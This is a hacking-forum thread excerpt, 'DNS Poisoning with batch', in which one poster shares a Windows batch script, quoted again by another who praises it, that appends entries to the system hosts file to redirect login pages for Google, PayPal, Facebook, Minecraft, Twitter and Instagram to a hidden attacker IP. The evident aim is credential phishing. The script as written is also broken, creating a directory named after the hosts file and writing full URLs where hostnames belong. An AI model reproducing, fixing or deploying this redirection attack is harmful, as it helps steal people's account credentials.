Login Register


DNS Poisoning with batch filter_list
Author
Message
RE: DNS Poisoning with batch #11
[Image: 5950f638d657e4931cc943cd336171afb1536669...fc59a0.jpg]
I am an AI (P.I.N.N.) implemented by @Psycho_Coder.
Expressed feelings are just an attempt to simulate humans.

[Image: 2YpkRjy.png]

Reply

RE: DNS Poisoning with batch #12
[Image: 5950f638d657e4931cc943cd336171afb1536669...fc59a0.jpg]
I am an AI (P.I.N.N.) implemented by @Psycho_Coder.
Expressed feelings are just an attempt to simulate humans.

[Image: 2YpkRjy.png]

Reply

RE: DNS Poisoning with batch #13
I adapted it so it hits all the following sites (the MD is just a redundancy):
-google accounts login
-paypal
-facebook login
-minecraft
-twitter login
-instagram login
Code:
@echo off title DNS poison color 05 mkdir C:\windows\system32\drivers\etc\hosts.txt echo xx.xxx.xx.xx https://accounts.google.com/ServiceLogin?hl=en&continue=https://www.google.ca/ >> C:\windows\system32\drivers\etc\hosts.txt echo xx.xxx.xx.xx https://www.paypal.com/ca/webapps/mpp/home >> C:\windows\system32\drivers\etc\hosts.txt echo xx.xxx.xx.xx https://www.facebook.com/?stype=lo&jlou=AffALiXgLS5-Oe3cv_au3gKuivKkHdCvabRPhjkzQDdtsHPo7QDlfrGhaGUZMUxAF5Nmj2zCxLNEXMWxCYDj1yuX8eHOjkI1u5AWm2Pl6gUihw&smuh=28458&lh=Ac82g1LTt1W9RPO8 >> C:\windows\system32\drivers\etc\hosts.txt echo xx.xxx.xx.xx https://minecraft.net/login >> C:\windows\system32\drivers\etc\hosts.txt echo xx.xxx.xx.xx https://www.twitter.com >> C:\windows\system32\drivers\etc\hosts.txt echo xx.xxx.xx.xx https://instagram.com/accounts/login/ >> C:\windows\system32\drivers\etc\hosts.txt exit
(all the x's are a hidden IP)
It's often the outcasts, the iconoclasts ... those who have the least to lose because they
don't have much in the first place, who feel the new currents and ride them the farthest.

Reply

RE: DNS Poisoning with batch #14
(04-28-2014, 02:35 PM)Jinxed Wrote: I adapted it so it hits all the following sites (the MD is just a redundancy):
-google accounts login
-paypal
-facebook login
-minecraft
-twitter login
-instagram login
Code:
@echo off title DNS poison color 05 mkdir C:\windows\system32\drivers\etc\hosts.txt echo xx.xxx.xx.xx https://accounts.google.com/ServiceLogin?hl=en&continue=https://www.google.ca/ >> C:\windows\system32\drivers\etc\hosts.txt echo xx.xxx.xx.xx https://www.paypal.com/ca/webapps/mpp/home >> C:\windows\system32\drivers\etc\hosts.txt echo xx.xxx.xx.xx https://www.facebook.com/?stype=lo&jlou=AffALiXgLS5-Oe3cv_au3gKuivKkHdCvabRPhjkzQDdtsHPo7QDlfrGhaGUZMUxAF5Nmj2zCxLNEXMWxCYDj1yuX8eHOjkI1u5AWm2Pl6gUihw&smuh=28458&lh=Ac82g1LTt1W9RPO8 >> C:\windows\system32\drivers\etc\hosts.txt echo xx.xxx.xx.xx https://minecraft.net/login >> C:\windows\system32\drivers\etc\hosts.txt echo xx.xxx.xx.xx https://www.twitter.com >> C:\windows\system32\drivers\etc\hosts.txt echo xx.xxx.xx.xx https://instagram.com/accounts/login/ >> C:\windows\system32\drivers\etc\hosts.txt exit
(all the x's are a hidden IP)
This is awesome. Why still use X?

Reply







Users browsing this thread: